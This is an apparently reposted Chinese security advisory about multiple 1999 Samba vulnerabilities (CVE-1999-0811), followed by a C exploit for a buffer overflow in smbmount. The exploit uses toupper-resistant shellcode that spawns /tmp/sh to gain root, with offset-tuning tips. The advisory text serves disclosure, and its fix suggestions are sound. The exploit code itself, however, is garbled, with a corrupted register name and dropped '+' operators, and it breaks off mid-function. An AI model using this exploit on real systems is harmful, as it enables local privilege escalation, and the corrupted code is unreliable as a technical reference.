Linux Samba软件包多个远程漏洞

2008-04-09 04:33:50来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Linux Samba软件包多个远程漏洞

发布日期:1999-07-21
更新日期:1999-07-21

受影响系统:
Samba Samba 2.0.4
- Debian Linux 2.1
- RedHat Linux 6.0
- RedHat Linux 5.2
- RedHat Linux 4.2
不受影响系统:
Samba Samba 2.0.5
- Caldera eServer 2.3.1
- Caldera OpenLinux 2.3
描述:
BUGTRAQ ID: 536
CVE(CAN) ID: CVE-1999-0811

Samba是在Unix类服务器上运行Netbios服务的程序。使用Samba软件包,可以方便地在Unix和Windows之间共享文件。

Samba软件包2.0.5以前版本中存在多个安全漏洞,第一个是nmbd拒绝服务攻击漏洞。第二个是smbd存在的一个缓冲区溢出漏洞,此漏洞在默认安装情况下不可利用,但如果系统管理员在smb.conf中设置了"message command"选项,攻击者可能利用此漏洞远程获取root权限。第三个是竞争条件漏洞如果smbmnt程序是以suid root属性安装的,攻击者可能利用此漏洞挂接文件系统中的任意目录。



<*来源:Andrew Tridgell (tridge@samba.org)

链接:https://www.redhat.com/support/errata/RHSA-1999-022.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Gerald Britton(gbritton@nih.gov) 提供了如下测试程序:


/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/

/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME. To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case). The user will need to create
** the ./a directory and then execute smbexpl to gain root. This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable. Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
** chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/

#include <stdlib.h>
#include <stdio.h>

#define DEFAULT_OFFSET -202
#define DEFAULT_BUFFER_SIZE 211
#define DEFAULT_ALIGNMENT 2
#define NOP 0x90

/* This shell code is designed to survive being filtered by toupper() */

char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";

unsigned long get_sp(void) {
__asm__("movl %esp,陎");
}

void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int alignment=DEFAULT_ALIGNMENT;
int i;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) alignment = atoi(argv[3]);
printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = get_sp() - offset;
fprintf(stderr,"Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) (ptr alignment);
for (i = 0; i < bsize-alignment; i =4)
*(addr_ptr ) = addr;

for (i = 0; i < bsize/2; i )
buff[i] = NOP;

ptr = buff (128 - strlen(shellcode));

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Allaire ColdFusion 未公开 CFML 标记漏洞

下一篇:Microsoft Windows NT IIS MDAC RDS远程命令执行漏洞(MS99-025